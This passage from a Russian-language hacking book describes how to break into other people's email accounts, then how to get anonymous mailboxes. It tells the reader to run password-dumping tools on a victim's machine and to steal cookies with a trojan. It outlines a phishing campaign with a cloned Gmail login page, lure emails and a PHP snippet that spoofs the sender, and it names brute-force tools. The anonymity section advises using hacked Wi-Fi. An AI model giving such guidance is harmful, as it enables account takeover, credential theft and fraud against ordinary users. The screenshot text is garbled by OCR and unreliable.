- Group Mail Free;
- Yahoo! Mail если пароль сохранен в приложении Yahoo! Messenger;
- Hotmail/MSN mail если пароль сохранен в приложении MSN Messenger;

2	http://www.sniperspy.com/
3	http://www.nirsoft.net/utils/mailpv.html
•	

• Gmail – если пароль сохранен в приложениях Gmail Notifier, Google Desktop или Google Talk.

Mail PassView – не единственная программа в своем роде. Существуют и другие программы:

- Outlook Password Decryptor (http://securityxploded.com/outlookpassworddecryptor.php) – позволяет восстановить пароли из Outlook, в том числе самых последних версий (Outlook 2016, работающей под управлением Windows 10);
- PstPassword (http://www.nirsoft.net/utils/pst\_password.html) еще одна программа для восстановления паролей, сохраненных в Outlook;
- WebBrowserPassView (http://www.nirsoft.net/utils/web\_browser\_password. html) – программа для восстановления паролей, хранящихся в браузере. Поддерживаются браузеры IE, Chrome, Opera, Safari, Firefox.

Все, что нужно, – это знать, какой почтовый клиент использует жертва. Найти программу для "восстановления" пароля из этого почтового клиента – не проблема. Если же жертва использует веб-интерфейс для чтения своего почтового ящика, тогда лучше использовать программу WebBrowserPass-View. Она поддерживает все версии Windows, начиная с 2000 и заканчивая 10. Старые версии вроде 98/МЕ не поддерживаются.

Нами была протестирована и эта утилита. Программа успешно восстановила все пароли, хранящиеся в браузерах IE, Firefox, Chrome и Opera (Safari не проверялся, но, думаю, и там будет полный "порядок"). Даже если ты не найдешь среди этого списка пароль от почтового ящика, сей список будет тоже полезен – ведь люди часто используют одни и те же пароли для разных служб.

Примечание. Программу WebBrowserPassView можно использовать и в более мирных целях, например, когда ты забыли свой же пароль, сохраненный в браузере. Собственно, для этого она и разрабатывалась. С другой стороны, сейчас тот же Chrome и все браузеры, основанные на нем, позволяют просмотреть сохраненные пароли. Но для этого нужно ввести пароль учетной записи пользователя, а вот если пароль на вход в систему не установлен (что часто бывает)...

### 3.4. Социальная инженерия или просто обман

Об этом способе не писал только ленивый. Много было уже сказано. Тебе кажется, что этот способ не такой эффективный, как о нем говорят? Ты ошибаешься.

Несколько лет была взломана почта директора ЦРУ Джона Бреннана. Абсурдность ситуации в том, что почту взломал не "матерый" хакер, а обычный подросток, правильно собрав информацию о своей "жертве". Подросток сначала связался с сотовым оператором, представившись сотрудником технической поддержки, уточнил детали аккаунта Бреннана.

После этого он позвонил в AOL и, представившись Бреннаном, попросил сбросить его пароль. Поскольку он знал всю необходимую информацию (номер почтового аккаунта, последние цифры банковской карты, 4-значный PIN-код, номер телефона), пароль был сброшен и никто ничего не заподозрил.

Чуть позже Wikileaks опубликовал письма директора ЦРУ<sup>4</sup>, см. рис. 3.6.

H The Considerant Ratio × ← → ♂ ☆ ● wildleaks.org	+ An investor the Connection of Section (1) and 10		- 0 ×
WikiLeaks Loai	s News About Partners	A SALE AND A SALES AND A	Search 9 Shop Donate Submit
-	The Conundrum of	Iran	(on 2015-10-21)
	- RELACION DELLA	Download PDF	
X		1 2 3 <b>5 N</b>	
Rin	is for help date of the	and the property of the second	S. LE MARKEN STREET
	的行為正式以及		THEY IN WARD TO MENTY
Watered Children		In a Counterform of IEEE The visit by stage right with the other products and the product and the product of the stage of of the s	
		There are assumed in the factor of the entry of space 12.3 science index in the space is a processing of the space of the space of the space of the entry space is the space of the space of the space of the entry space of the space of the space of the space of the entry space of the space of the space of the space of the entry space of the space of the space of the space of the entry space of the space of the space of the space of the entry space of the	

Рис. 3.6. Письма директора ЦРУ, опубликованные Wikileaks

Преимущество этого способа в том, что не нужно обладать никакими специальными знаниями и этот способ под силу любому. Успех этого метода зависит от смекалки "нападающего" – сможет ли он найти нужную информацию или нет.

https://wikileaks.org/cia-emails/The-Conundrum-of-Iran/page-1.html

4

### 3.5. Модное слово "фишинг"

Попросим пользователя самого сообщить нам свой пароль. Нет, этот способ не подразумевает физического насилия, и ни один из пользователей в результате эксперимента не пострадает. Во всяком случае, физически.

Суть этого метода в следующем: нужно создать поддельную версию страницы авторизации того сервиса, который вас интересует. Например, если нужно получить пароль от почты Mail.Ru, тогда надо создать такую же страницу входа.

Примечание. Пример письма: можешь написать владельцу сайта, что на его счету заканчиваются средства, что истекает срок действия домена, что закончилось место на диске хостинга. Замани пользователя на свой сайт, и ты получишь пароли от доступа в панель управления хостингом. Мы не будем брать 10% за идею, считай это полезным бонусом к книге!

Далее нужно заманить пользователя на поддельную страницу. Это можно сделать несколькими способами:

- Отправить ему сообщение якобы от имени администрации того сервиса. В сообщении указать, что-то вроде "Вы давно не заходили в свой почтовый ящик. Если вы не воспользуетесь ним до <дд.мм.гг>, он будет удален.". Рисуем кнопочку Войти, нажав которую пользователь попадет на твою страницу авторизации.
- Отправить сообщение со ссылкой, которая должна заинтересовать пользователя. Когда он перейдет по ней, он увидит сообщение о необходимости входа для просмотра содержимого. Сейчас многие сервисы позволяют войти с помощью учетной записи Mail.Ru или одной из социальных сетей. Так что пользователь может ничего и не заподозрить.

Очень часто описывается только "общее направление". Сейчас мы попробуем реализовать его и посмотреть на реакцию обычных пользователей. Способ довольно непростой, и для его реализации понадобятся, как навыки программирования на PHP, так и некоторые финансовые вложения. Ведь нам понадобится хостинг с поддержкой PHP (для выполнения PHP-сценария и размещения формы авторизации) и доменное имя, "похожее" на имя взламываемого сервиса. Конечно, опытный пользователь сразу заметит подлог, но неопытный пользователь (или просто в спешке) может ничего не заметить.

Итак, мы создали форму авторизации, похожую на форму входа в Google. Результат наших стараний изображен на рис. 3.7. Страница полностью идентична странице входа в Google. Вот только обрати внимание на строку адреса. Сразу не заметил? Возможно, реальный пользователь тоже не заметит подлога. Создать такую страницу очень просто – выполните команду Сохранить как в браузере.

Далее мы отправили некоторым сотрудникам сообщение о том, что их почтовый ящик будет заблокирован. Обратите внимание, что дизайн письма даже отдаленно (если не считать логотипа) не напоминает дизайн, используемый Google. Но, как показала практика, для наших пользователей этого было достаточно. Можно было бы взять исходный код письма, которое отправляет Google, сделать все более качественно. В реальных условиях злоумышленник так и сделает – будьте в этом уверены.

+ - C A D	Jaccount/Ridentifier	~ 미 X
	Google	
	One account. All of Google. Sign in to continue to Gmail	
	Enter your email         Net         Net         Create accuted         One Geogle Account for everything Geogle         Image:	

Рис. 3.7. Поддельная версия страницы входа в Gmail

Что произошло дальше? Дальше пользователи прочитали письмо, перешли по ссылке и наивно ввели имя пользователя и пароль, которые были переданы сценарию. Сценарий принимает эти данные и записывает в текстовый

файл. Написать такой сценарий сможет любой новичок, владеющий основами РНР. Примерный код сценария (это не тот сценарий, который использовали мы) приведен в листинге 3.1.

#### Листинг 3.1. Простейший сценарий записи паролей

Результат работы нашего сценария будет примерно таким:



Для отправки сообщения использовалась почта Yahoo!, чтобы не бороться с антиспамом. Но можно было бы пойти и по иному пути. Например, найти сервер SMTP со свободной отправкой писем (без авторизации). Как правило, это будет неправильно настроенный SMTP-сервер какой-то небольшой организации. Списки таких серверов регулярно обновляются на специальных ресурсах. Думаю, не составит особого труда найти такой список. Далее можно развернуть на локальном компьютере веб-сервер с поддержкой PHP. Тогда у тебя будет доступ к php.ini и можно будет указать SMTP-сервер, через который функция *mail()* будет отправлять письма. С другой стороны, можно попытаться отправить сообщение и через собственный хостинг (не обязательно устанавливать локальный веб-сервер). Все зависит от его настроек. Мы, например, для выполнения сценария отправки нашего сообщения использовали наш хостинг. На нем функция mail() выполнилась без особых нареканий. Понятно, что если просмотреть все заголовки письма, "след" приведет к нам. Но для нас сейчас это не важно. Сейчас важно, чтобы в почтовом клиенте поле "From" содержало то, что нам нужно. В первом способе мы поступили именно так, то есть для отправки сообщения использовали функцию mail().

Стандартная PHP-функция *mail()* позволяет с легкостью указать как текст письма, так и его заголовки. Например:

```
$headers = 'From: Security Service <no-reply@example.com>' ."\r\n" .
    'Reply-To: no-reply@example.com' . "\r\n";
mail($to, $subject, $message, $headers);
```

Письма, отправленные таким образом, миновали антиспам Google (не попали в папку **Спам**) и нормально отображались как в почтовом клиенте (проверялось в Outlook и The Bat!), так и в веб-интерфейсе. Конечно, перед отправкой сообщения жертве лучше отправить его на свой ящик и убедиться, что письмо отображается правильно, как минимум, что почтовый клиент правильно определяет кодировку. Если это не так, в \$headers нужно добавить заголовки, описывающие кодировку письма.

Теперь о результатах. Определенные результаты при использовании этого метода все же были получены. Некоторые из пользователей проверяемой компании оставили свои реальные пароли. Некоторые не отреагировали на это письмо и обратились к администратору. А некоторые догадались, в чем дело, и вместо пароля ввели абракадабру. Но все же несколько реальных паролей были получены, так что этот метод работает, несмотря на весь скептицизм.

### 3.6. Восстанавливаем пароль

Теперь попробуем вспомнить то, что никогда не знали, – пароль от почтового ящика жертвы. Очень часто почтовые службы позволяют восстановить забытый вопрос. А чтобы убедиться, что пользователь, пытающийся восстановить доступ к ящику, является его владельцем, почтовая служба задает контрольный вопрос, указанный при регистрации почтового ящика. Если нужно взломать ящик знакомого тебе человека, то есть вероятность, что ответ на вопрос тебе знаком. Если же ты взламываешь почту чужого человека, то первое, что нужно сделать, – это заняться изучением жертвы.

Чем больше соберется информации о жертве, тем проще будет взломать почтовый ящик. Информацию можно собирать разными способами – можно втереться в доверие к самой жертве и выведать как бы случайно у нее нужную вам информацию (например, девичью фамилию матери), а можно подружиться с друзьями жертвы. Благо социальные сети позволяют быстро найти не только жертву, но и ее друзей.

### **3.7. Кража Cookies**

Еще один неплохой способ получения доступа к почтовому ящику – это кража Cookies.

Конечно, он эффективен, если жертва хранит свои пароли в браузере. Даже если ты не получишь пароль к почтовому ящику, ты можешь получить пароли к другим сервисам. Пользователи часто используют одни и те же пароли для доступа к разным сервисам. Поэтому если ты найдешь пароль к одному сервису (например, к блогу, форуму), ты можешь попытаться его использовать при входе в почтовый аккаунт. Есть вероятность, что он подойдет.

Как украсть Cookies ("куки")?

Существуют различные способы – от использования трояна (см. рис. 3.8) до банального копирования на флешку или свой FTP, если вы оказались за компьютером жертвы. Под рукой нет приложения для получения паролей? Не беда! Можно просто скопировать каталог с Cookies и проанализировать на своем компьютере. Для анализа Cookies можно использовать самые разные утилиты, например CookieSpy, которая поддерживает не только установленные, но и portable-браузеры, что позволяет "подсунуть" программе каталог с Cookies.

	A REAL PROPERTY		/ ULIA-	373772-XP
CLIENT OVERVIEW FILE MANA	GER PROC	ESS VIEW	REMOTE SHELL SAVED DATA	
File Name	Type Sia		Creation Time	
Ello	March March			
di oracle_jre_usage	Folder N/	A	21.10.2015 10:03:55	
Git Application Data	Folder N/	A	17.02.2012 14:32:37	
Cookie	Enider N	A	17.02.2012 14:32:37	
Docto Download File +	Default Loca	tion	20.02.2012 9:20:29	Call Contraction of the Contract
Ciai Docto 🛃 Execute File	Choose Loca	tion	13.02.2014 13:33:00	
ECom 🏠 Refresh Files	Folder N/	A	19.02.2012 23:31:16	
Une IETIdC New File	Folder N/	A	19.02.2012 23:30:41	
Cill Local	Folder N/	A	17.02.2012 14:32:37	
Rai NetHo	Folder N/	A	17.02.2012 14:32:37	Card and the second states of the second states of the second states of the second states of the second states
Delete item(s)	Folder N/	A	17.02.2012 14:32:37	
(iliii Privaci @ Block Item(s)	Folder N	A	19.02.2012 23:33:08	
Encrypt Item(s)	Folder N/	A	17.02.2012 14:32:37	the state of the second s
Search Directory	Folder N	A	17.02.2012 14:32:87	
Call temp and Quick Browse +	Folder N	A	02.08.2012 14:43:57	
Па Главное меню	Folder N	A	17.02.2012 14:32:36	
122 Избранное	Folder N	A	17.03.2012 14:32:36	
62 Мон документы	Folder N	A	17.02.2012 14:32:36	
Спо Рабочний стол	Folder N	A	17.02.2012 14:32:36	
Шатшаблоны	Folder N	A	17.02.2012 14:32:36	
.iBank2	File 6,4	KB	12.04.3012 10:48:42	
NTUSER.DAT	File 6,1	S MB	17.02.2012 14:32:96	
ntuser.dat.LOG	File 1	CB	17.02.2012 14:32:37	
ntuser.ini	File 17	8 Bytes	17.02.2012 14:32:37	
SU2TMPCFG	File 20	22 KB	21.02.2012 13:05:40	
the second second				
1. S. S. S.	324 4			
· · · · · · · · · · · · · · · · · · ·		and shall		
Ci\Documents and Settings\Cepreesa\		and the start is a second		
and a particular of the same of the same of the same same share to	and birther change in the	of the spinor will be a description that periods	to proper the self- sold- water play and the self in a party of the self.	the last sector is the sector barren of the sector barren being the sector of the sector of the sector barren of the

Рис. 3.8. Использование трояна для кражи Cookies

### 3.8. XSS-уязвимости

Один из способов взлома электронной почты – это использование XSSуязвимостей. Вот только вряд ли можно назвать его эффективным. Вопервых, все найденные XSS-уязвимости в популярных почтовых сервисах очень быстро устраняются. Во-вторых, учитывая "во-первых", искать XSSуязвимость придется самому (ведь все найденные уязвимости уже закрыты). А на поиск потребуется определенное время. Да и реализация атаки через XSS-уязвимость требует повышенной квалификации. Как вариант, этот метод можно рассмотреть. Сугубо из академического интереса. Но если нужно побыстрее взломать почту, тот же социальный инжиниринг окажется более эффективным.

### 3.9. Метод грубой силы

Самый неэффективный способ. Он заключается в переборе пароля по списку. Программа просто пытается подобрать пароль методом "тыка" (он же метод Коши). Конечно, в идеальных условиях у нее это рано или поздно получится. Но практически все сервисы заблокируют почтовый ящик после 3-5 неудачных попыток. Поэтому вряд ли у тебя получится использовать "метод грубой силы". Если все-таки хочется попытаться, тогда можно попробовать применить утилиту Brutus, работа с которой обсуждается на *hackerthreads*. В главе 10 будут приведены ссылки на списки паролей, которые ты можешь использовать в том числе и для брутфорсинга почтовых ящиков. Вряд ли тебе повезет, поскольку сам метод в последнее время малоэффективен. Но списки паролей мы тебе предоставим.

Есть и еще одна довольно популярная утилита – THC-Hydra, позволяющая взломать самые различные сервисы:

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC u XMPP.

В следующей главе мы рассмотрим, как отправлять электронную почту анонимно.

# Глава 4.

# Как отправлять электронную почту и другие электронные сообщения анонимно

Вопрос анонимного общения будоражит умы большинства пользователей. К сожалению, ни о какой анонимности речи быть не может. О чем мы говорим, если для регистрации в мессенджере или в почтовом сервисе нужно ввести номер телефона. На Mail.ru можно отказаться от ввода номера телефона? Да, можно. Но попробуй-ка зарегистрироваться с сети Тог. У тебя ничего не получится – пока система не увидит реальный IP-адрес, зарегистрироваться не выйдет. В этой главе мы поговорим об электронной почте, анонимности, мессенджерах.

### 4.1. Заповеди параноика

Минимальный набор параноика:

- Не отождествляемый с тобой интернет-канал. Здесь несколько вариантов:
   взломанный чей-то Wi-Fi или мобильный (4G) Интернет, карточка и мобильный телефон но они не должны быть зарегистрированы на тебя.
- Для шифрования трафика используем Tor, VPN + Tor.

Настоящие параноики еще и работают в виртуальной машине, операционная система которой отличается от той, что установлена на компьютере. Например, на ноутбуке у параноика установлена Linux, в виртуальной машине – Windows 10. В случае опасности виртуальная машина удаляется, на компьютере остается абсолютно чистая и незапятнанная Linux. Довольно неплохая комбинация получается.

В этой схеме портит все только номер телефона, к которому привязываются почтовые сервисы и мессенджеры. Даже если телефон не зарегистрирован

на тебя лично, по нему можно определить местоположение и точку покупки, а по вездесущим камерам – вычислить тебя.

Если IP-адрес можно легко скрыть с помощью Tor/VPN, то если ты сам укажешь номер телефона для регистрации в почтовом сервисе, то сам себя раскроешь. Именно поэтому нужно выбирать такие мессенджеры и почтовые сервисы, которые позволяют регистрироваться без указания номера телефона.

### 4.2. Цели анонимности почтового ящика

Нужно задуматься, зачем тебе анонимный почтовый ящик и для каких целей ты планируешь его использовать. Существует возможность шифрования переписки, и в этом случае ты можешь использовать любой почтовый сервис, хоть Gmail, хоть Mail.Ru – даже если кто-то (или другой хакер, или администратор почтового сервиса/спецслужбы) захочет просмотреть твою почту, то он сможет это сделать. Но вся почта будет в зашифрованном виде и ничего, кроме абракадабры, он не увидит. Поскольку у этой третьей стороны не будет твоего закрытого ключа, она не сможет расшифровать сообщения. Следовательно, толку от взлома твоего почтового ящика не будет.

Поэтому вывод – если анонимная почта тебе нужна для конфиденциальной переписки с одним или несколькими адресатами (твои друзья или коллеги), то можешь использовать любой почтовый сервис вместе с шифрованием.

Как реализуется шифрование. Шифрование почты, как правило, производят по типу открытого/закрытого ключа. Ты и каждый твой друг формирует ключевую пару – открытый/закрытый ключ. Открытый ключ предназначен для шифрования сообщения, предназначенного для конкретного пользователя.

Представим, что у тебя есть два друга – Марк и Женя. Ты и каждый твой друг сгенерировали ключи – у каждого из вас есть ключевая пара. Пусть открытый ключ Марка называется ОКМ, открытый ключ Жени – ОКЖ. Соответственно, закрытые ключи называются ЗКМ и ЗКЖ.

Затем все вы должны обменяться открытыми ключами. Обрати внимание: не ключевыми парами, а только открытыми ключами. Ты отправляет свой открытый ключ друзьям, а взамен получаешь ОКМ и ОКЖ, которые ты устанавливаешь в своей почтовой программе.

................

Теперь, когда ты хочешь отправить зашифрованное сообщение для Марка, то ты шифруешь его с помощью ключа ОКМ. Марк, получив зашифрованное сообщение, может его расшифровать своим закрытым ключом – ЗКМ.

Аналогично, когда тебе Марк захочет отправить зашифрованное сообщение, он зашифрует его твоим открытым ключом, а ты сможешь расшифровать его только своим закрытым ключом. Именно поэтому закрытые ключи нужно держать в тайне, поскольку они используются для расшифровки сообщений, адресованных тебе.

Когда тебе нужно отправить сообщение и Марку, и Жене, ты шифруешь его ключами ОКМ и ОКЖ одновременно, а каждый из адресатов сможет расшифровать такое сообщение своими закрытыми ключами.

У данного типа шифрования есть недостатки:

- Оно сложно для понимания обычными пользователями. Даже если кто-то и разберется, не факт, что это получится у кого-то другого. В результате этот кто-то сможет отправить тебе незашифрованное сообщение с конфиденциальной информацией. Не все твои друзья, коллеги и родственники айтишники!
- У ключа есть срок действия. Да, срок действия устанавливается при генерировании ключа самим пользователем. Но бывает так, что пользователь не обратил внимания на это и сгенерировал ключ сроком на 1 год. Один год он успешно пользуется шифрованием, а затем начинаются проблемы. Представь, что у тебя есть архив служебной переписки, которая была зашифрована твоим открытым ключом. Через год почтовая программа сообщит тебе, что ключ недействительный. Ты все еще сможешь расшифровать ним сообщения, адресованные тебе, но ты больше не сможешь никому написать сообщение. Ты генерируешь новый ключ, на этот же адрес электронной почты, отправляешь сообщение другу и радуешься. Но радость будет недолгой вскоре ты заметишь, что не сможешь расшифровать старые сообщения. Выходит, все, что было написано тебе за год, уже не поддается расшифровке, потому что закрытый ключ уже другой.
- Не все программы поддерживают шифрование с открытым ключом. Да и вообще в последнее время намечается тенденция использования веб-интерфейсов для работы с почтой, а не обычного приложения. Вебинтерфейс, как правило, не поддерживает возможность работы с ключами.
Если ты заинтересовался, делимся официальной инструкцией от Microsoft, как шифровать сообщения в Outlook:

#### https://bit.ly/3n9lgCV

Есть и простые способы передачи зашифрованных сообщений по открытым каналам связи (таким считается общедоступный почтовый сервис, несмотря на использование протокола HTTPS).

- Использование запароленных архивов создаешь документ, возможно, с паролем, если это документ MS Word, затем архивируешь ZIP/RAR, так же с паролем. Полученный архив отправляешь по электронной почте, в тексте письма ничего не пишешь, вся информация в архиве. Два пароля – разные. Паролями нужно обменяться не по электронной почте, а какимто другим способом, например при личной встрече. Недостаток этого способа в том, что, как будет показано далее в этой книге, достаточно легко "восстановить" пароль архива. Существуют программы для брутфорсинга архива, позволяющие подобрать пароль. Чтобы максимально усложнить задачу программе, нужно использовать сложные пароли, состоящие из как минимум 20 символов.
- Использование криптоконтейнеров принцип тот же, что и с архивом

   создаешь в VeraCrypt криптоконтейнер, задаешь сложный пароль, помещаешь в него файлы (ну или один файл с сообщением) и отправляешь по электронке. Пароль передаешь отличным от электронной почты способом. Как и в случае с архивом, максимальный размер контейнера 20 Мб, все что больше или не будет отправлено, или будет загружено в облако (как, например, на GMail) и отправлено в виде ссылки. С криптоконтейнерами способ рабочий, но не очень удобный его нужно скачать, открыть и т.д. С другой стороны, твоя почта под защитой.

Совсем другая задача, если тебе не нужно вообще, чтобы почта ассоциировалась с тобой. Например, ты хочешь купить хостинг или VDS, зарегистрировать VPN-аккаунт и т.д. Все эти сервисы требуют в качестве логина e-mail. Чтобы тебя не смогли вычислить по –email, тебе нужно использовать почту, созданную без привязки к номеру телефона. В следующем разделе мы попробуем такую заполучить.

# 4.3. Получаем анонимную почту

Существует не так много почтовых сервисов, где ты можешь получить почтовый ящик, не указывая номер телефона:

- tutanota.com (он же tuta.io)
- protonmail.com (он же pm.me)
- openmailbox.org
- gmx.com

Первые два предоставляют зашифрованные почтовые ящики, то есть почта на серверах почтового сервиса хранится в зашифрованном виде и для ее расшифровки нужен пароль, указанный при регистрации ящика.

Третий нормально работал до написания этого материала. Когда же авторы этой книги хотели упомянуть его, сервис стал выдавать ошибку 503, надеемся, скоро поправят, но популярности это сервису не добавит, и мы не рекомендуем его использовать. Если сервис "лежит" столь продолжительное время, не нужно его использовать. В этой книге он упоминается как раз по этой причине – чтобы ты его не использовал. Что же касается qmx.com, то это обычный почтовый ящик, представляющий тебе 65 Гб дискового пространства и позволяющий отправлять вложения размером до 50 Мб (чего не позволяют другие почтовые сервисы).

Посмотрим, разрешат для анонимные tutanota и prontomail зарегистрироваться через сеть Тог. Начнем с tutanota.com. Главная страница нормально откры-

лась (рис. 4.1).



Рис. 4.1. Главная страница tutanota.com

При нажатии кнопки Sign-up появляется страница с выбором тарифного плана. Выбираем Free. Далее ты должен подтвердить, что ты не используешь какие-либо другие бесплатные аккаунты на этом сервисе и что ты не будешь его использовать в коммерческих целях (рис. 4.3).



Рис. 4.2. Выбор тарифного плана



Рис. 4.3. Поставь обе галки и нажми кнопку "ОК"

Далее все просто – вводим логин, пароль, подтверждение пароля, ставим опять две галки и нажимаем **Next**. Но не тут-то было: сервис не позволит зарегистрироваться, если пароль не очень сложный. Так что тренируйся в усложнении пароля, пока индикатор сложности не будет заполнен полностью.

Ernail addras Skynet 111220 Ernail address is available. Sef possword	)@tutanota.c	-om	3	
Email address skynet111220 Email address is available. Set possword	)@tutanota.c		(3)	
Email address skynet111220 Email address is available. Set possword	)@tutanota.c			12 200
Email address skynet111220 Email address is available. Set possword	)@tutanota.c	om O		
skynet111220 Email address is available. Set possword	)@tutanota.c	iom mor		10.254
Ernail address is available. Set possword				10.00
Set password				STREET.
				1. 45 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1.
********	-			1.1.1
Password is not secure enough.				1. 1. 1. 1. 1.
Please store this password in a secure place. We	are not able to	restore your		1.19
encrypted.	ar your data is en	0-10-600		1 1
Reneral processed				and the second
				1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1
Password ok.				1.1.1
I have read and arres to the foll	lowing docur	mante		1. 1. 1.
General terms and conditions	owing docu	inerits.		
Privacy policy				Ser alla
Children and have been readed				1.1
I am at least 16 years old.	10 10			
		-		

Рис. 4.4. Пароль недостаточно сложный

(2) (3)	Back	Subscription
Import flatters         Support11220@stutanota.com         Ernsi actriess a available.         Set password         Password of         Plasses tore thin password in a sectore place. We are not able to restore your personer or to restry your account because all of your data is end-to-end encoupled.         Plasses tore thin password in a sectore place. We are not able to restore your personer or to restry your account because all of your data is end-to-end encoupled.         Password or to restry your account because all of your data is end-to-end encoupled.         Password or to restry your account because all of your data is end-to-end encoupled.         Datave read and agree to the following documents:         @ General terms and conditions Privacy policy.         @ I am at least 16 years old.	- 11 C	3
Bigynet111220@stutanota.com         Emeil address is available.         Set password         Password ok         Password         Repeat for sets top will password in a secure place. We are not able to restore your person or to rest your account because all of your data is end-to-end encrypted.         Repeat fusion         Password ok         Password ok         D have read and agree to the following documents:         Separat terms and conditions Privacy policy         V an at least 16 years old.		것 같은
skynet111220@stutanota.com Email address is available. Set password Password ok Password ok Password on a secture place. We are not able to restore your personer or to restrip your account because all of your date is end-to-end encrypted. Password ok Passwor	121 1 1 1 1 1 4	Emoil address
Email address a available. Set possword  Prevence of:  Reserved to:  Reserved to:  Reserved to the possword is a secure place. We are not able to resoure your reserve your account because all of your data is end-to-end, encrypted.  Reserved to the secure place. We are not able to resoure your resource your data is end-to-end.  Reserved to the secure place. We are not able to resource your resource your resource your resource your account because all of your data is end-to-end.  Reserved to the secure place. We are not able to resource your re		skynet111220@tutanota.com
Set pussioned Paramotic of: Please store this paramotic is escaire place. We are not able to restore your personnel or to restry our account because all of your data is end-to-end escrypted. Repart pussioned Paramotic of the I have read and agree to the following documents: General terms and conditions Privacy policy I an at least 16 years old.	7 1 1 1 1	Email address is available.
Password of C Please store this password in a secure pleas. We are not able to restore your persevent or to restry our account because all of your data is end-to-end encrypted. Repart pussword Compart pussword Password ok. J have read and agree to the following documents: C General terms and conditions Privacy policy C I am at least 16 years old.	1.	Set possword
Pleases of a dit Please store this password in a sectore place. We are not able to restore your persistent or to restrict your account because all of your data is end-to-end encrypted. Repair fassword ••••••••••••••••••••••••••••••••••••		*********
Presence to the parsmonth of a statute parace, we are not able to able to be encrypted. Repet reservoir Presence ok. I have read and agree to the following documents: Second terms and conditions Privacy policy I am at least 16 years old.		Password ok.
Repeat password ••••••••••••••••••••••••••••••••••••		Please store this password in a secure place. We are not able to restore your pesseord or to reset your account because all of your data is end-to-end encrypted.
Password ok Password ok I have read and agree to the following documents: Seeneral terms and conditions Privacy policy I am at least 16 years old.	en i san i	Repeat password
Password ok I have read and agree to the following documents: Seeneral terms and conditions Privacy policy I am at least 16 years old.	1949 1 - 24 - AN	**********
I have read and agree to the following documents: C General terms and conditions Privacy policy C I am at least 16 years old.	Carles C.	Password ok.
<ul> <li>General terms and conditions         Privacy nolicy         I am at least 16 years old.     </li> </ul>	e and the second	I have read and agree to the following documents:
I am at least 16 years old.		<ul> <li>General terms and conditions</li> <li>Privacy policy</li> </ul>
		I am at least 16 years old.

Рис. 4.5. С паролем все хорошо

Далее нужно подождать, пока готовится твоя учетная запись. И тут облом подкрался незаметно: регистрация отклонена, почтовому сервису не нравится IP-адрес.



Рис. 4.6. Настораживает

Что можно сделать:

- 1. Подключиться через VPN-соединение, а не через Tor.
- 2. Выбрать другую цепочку Тог.

Мы не будем этого делать, а на этом же IP-адресе зайдем на *https://proton-mail.com*/ и попробуем зарегистрироваться там (рис. 4.7).



Принцип тот же, что и в прошлом случае, – нужно выбрать тарифный план. Выбираем Free (рис. 4.8).



Рис. 4.8. Выбор тарифного плана

Пробуем ввести те же данные – тот же логин и даже тот же пароль, чтобы не было претензий к его сложности. Но якобы для проверки того, что ты являешься человеком, сервис... запросил номер телефона или донат. По донату тоже легко отследить, кто ты есть (если у тебя нет ворованных номеров кредитных карт).

c C 📾 report protonnia	A CREATE YOUR ACCOUNT	-		H O V	-
	B CREATE TOOR ACCOUNT			A CONTRACTOR	
	Take back your privacyl Creating your secure eme account takes less than 2 minutes.	ad -			
	Username and domain				
	Ta's we be your new Procontage email address.	the second second			81
	skynet111220 (g protonmail.com				
					8
a management of the	2 Password				63
	•••••				9
	·····				
	1 The State of State of State of State of State of State				
	If you lose your password, you will not be able to read your emails.				
		1.			
	Recovery email (optional)				63
	This is used to receiver your account if you get looked out o forget your password	x	22		
	Recovery enail				
	By clicking Greate Account, you agree to abide	by		and start	
	PTODEMAS S OFFICE AND CONTRACTOR				
	CREATE ACCOUNT				

😌 secure envert Tutancia tree 🛛 🗴 🦳 Mar 🗲 🤅 🤤 👘 protonmail.com	e Lone, Rom Tutancha I., X. 😫 Signup Linotonitali X. +	9606 - +++ XX	n × ⊙ v ≞
			· Report bus
		•	
	Are you human? To light spain, please with you are human. Vour email or growne mulhers with the immed to the apoount created. It is only used sump the eight process A huan with an samet to prevent abuse of the Proceedings of pleases.		
	SMS Office this required?     Donate		
	/2010-35-073V		
	COMPLETE SETUP		
			Sec.
•	2320 PROTONMAL COM - MADE GLOBALLY HOSTED IN SWITZERLAND		

Рис. 4.10. Тоже не получилось зарегистрироваться

С **qmx** вышло то же самое. Затем мы наткнулись на сервис mailnesia.com и нам удалось зарегистрировать почтовый ящик без указания номера телефона, правда, пришлось долго разгадывать капчу Гугла.

		CHECK YOUR INBOX
		Type makers are parts Fill (P) @malleelacom and
		Rados millor
MAILNESIA		
TERMOBILE VERSION		
	Anonymous E-	Mail In Seconds
FEATURES	1.	Dispossible small at its hast. Whenever you need to replate on a site and you don't more to stop our your release
BLOG	Automatically elicks registration links	zmail address, use any @easileseia.com address instead. Email verification links are visited automatically in th background to validate the account instandy!
TRANSLATION	HTML support	It's like other webmail services, but there is no registration or password here. Every incoming email is accepted an can be viewed by anyone who known the acciptent name.
THANKS TO	RSS feed for every mailbox	Avoid SPAM, unaplicited continercial small and newdotrees by using a mailnesia.com temporary small address o websites, gasetbooks, foruma, when writing command or whenever an small address is meeded. Shate your real ema address only with people your know and trut.
	Aliases enhance anonymity	Do not send any similive information here (like financial, online banking) because anyone could read it after guessia
CONTACT	All and a second	lifebackgrunkeneen
FAQ		Featured on: III CITOCACT INCINCOACO
		Bute with the Papi Programming Language - Terms and conditions of acriso

Рис. 4.11. Главная страница сервиса

Особенность этого сервиса, что это так называемый односторонний (oneway) сервис. Ты можешь зарегистрировать почтовый ящик, получать на него письма, но ты не можешь написать новое письмо или ответить на полученное письмо. То что нужно для анонимной регистрации на всевозможных сервисах! Как правило, при регистрации в сервисе на указанный e-mail отправляет ссылка для подтверждения e-mail. По сути, почтовый ящик нужен только для получения этой ссылки активации учетной записи. С этой задачей отлично справится mailnesia.com.



Рис. 4.12. Почтовый ящик зарегистрирован

